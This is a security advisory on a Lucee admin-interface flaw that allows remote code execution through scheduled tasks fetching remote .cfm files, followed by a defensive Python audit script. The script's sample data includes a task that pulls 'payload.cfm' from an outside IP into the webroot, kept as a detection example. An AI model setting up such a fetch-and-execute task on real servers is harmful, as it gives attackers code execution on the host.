Lucee Remote Code Execution Vulnerability in Admin Interface via Scheduled Tasks
Vulnerability
A remote code execution vulnerability has been identified in Lucee's administrative interface, affecting both Lucee 5.x and 6.x. This vulnerability arises from an insecure design in the scheduled task functionality, which allows an authenticated administrator to create a job that retrieves a remote .cfm file from an attacker-controlled server. The file is then executed with the privileges of the Lucee service account. The vulnerability exists because Lucee does not implement integrity checks, path restrictions, or execution controls for scheduled task fetches, enabling the execution of arbitrary code.
Impact
Exploitation of this vulnerability allows for authenticated remote code execution on the Lucee server, with the executed code running under the user account specified during Lucee installation. On Windows, this is a service account, while on Linux, it is typically the root user or the 'lucee' user.
Reproduction
To reproduce this vulnerability, an authenticated administrator must access the Lucee admin interface at '/lucee/admin/web.cfm'. From there, a scheduled job can be created that fetches a .cfm file from a remote server controlled by the attacker. Once the file is retrieved, it will be executed on the server, leading to code execution with the privileges of the Lucee service account.
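From a defender's side, the pattern described above (a scheduled task that fetches a remote URL and publishes the response to an executable file under the webroot) is straightforward to audit in the task definitions themselves. The following Python script is an added example, not Lucee's own code. It assumes the scheduler is stored as an XML document of `<task>` elements with `name`, `url`, `publish` and `file` attributes, that the organization keeps a host allowlist, and that the webroot paths listed are the deployment's; the sample XML is constructed for illustration.

```python
"""Audit Lucee scheduled-task definitions for the fetch-and-publish-to-webroot pattern.

Added example (not Lucee's code). Assumed layout: <schedule><task name=.. url=..
publish=.. file=.. /></schedule>. Sample data below is constructed.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed sample: one benign job, two jobs matching the risky pattern.
SAMPLE_SCHEDULER_XML = """<schedule>
  <task name="nightly-report" url="https://reports.internal.example/run.cfm"
        publish="false" file="" interval="daily" />
  <task name="sync" url="http://203.0.113.10/payload.cfm"
        publish="true" file="/var/www/html/sync.cfm" interval="60" />
  <task name="cache-warm" url="https://cdn.example.net/index.html"
        publish="true" file="/opt/lucee/tomcat/webapps/ROOT/warm.cfm" interval="3600" />
</schedule>
"""

# Assumptions: hosts the organization approves for scheduled fetches, and the
# directories from which Lucee serves and compiles templates on this host.
ALLOWED_HOSTS = {"reports.internal.example"}
WEBROOTS = ("/var/www/html", "/opt/lucee/tomcat/webapps")
EXECUTABLE_EXT = (".cfm", ".cfc", ".cfml")


def audit_task(task):
    """Return a list of findings for one <task> element (empty if nothing is flagged)."""
    findings = []
    url = task.get("url", "")
    publish = task.get("publish", "false").strip().lower() in ("true", "yes", "1")
    file_path = task.get("file", "").strip()
    host = urlparse(url).hostname or ""

    if host and host not in ALLOWED_HOSTS:
        findings.append(f"fetches from non-allowlisted host {host}")
    # Publishing the HTTP response to a CFML file is what turns a fetch into execution.
    if publish and file_path.lower().endswith(EXECUTABLE_EXT):
        findings.append(f"publishes response to executable template {file_path}")
    if publish and any(file_path.startswith(root) for root in WEBROOTS):
        findings.append("writes response inside a web-served directory")
    return findings


def audit_scheduler(xml_text):
    """Map task name -> findings for every task that has at least one finding."""
    root = ET.fromstring(xml_text)
    report = {}
    for task in root.iter("task"):
        findings = audit_task(task)
        if findings:
            report[task.get("name", "<unnamed>")] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit_scheduler(SAMPLE_SCHEDULER_XML).items():
        print(f"[!] task {name!r}:")
        for f in findings:
            print(f"      - {f}")
```

Run against the constructed sample, the benign `nightly-report` task produces no findings, while `sync` and `cache-warm` are each flagged on all three checks. In a real deployment, point `audit_scheduler` at the scheduler file Lucee writes for each web context, run it from a periodic job, and alert on any new task that both fetches from outside the allowlist and publishes to a template under the webroot.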
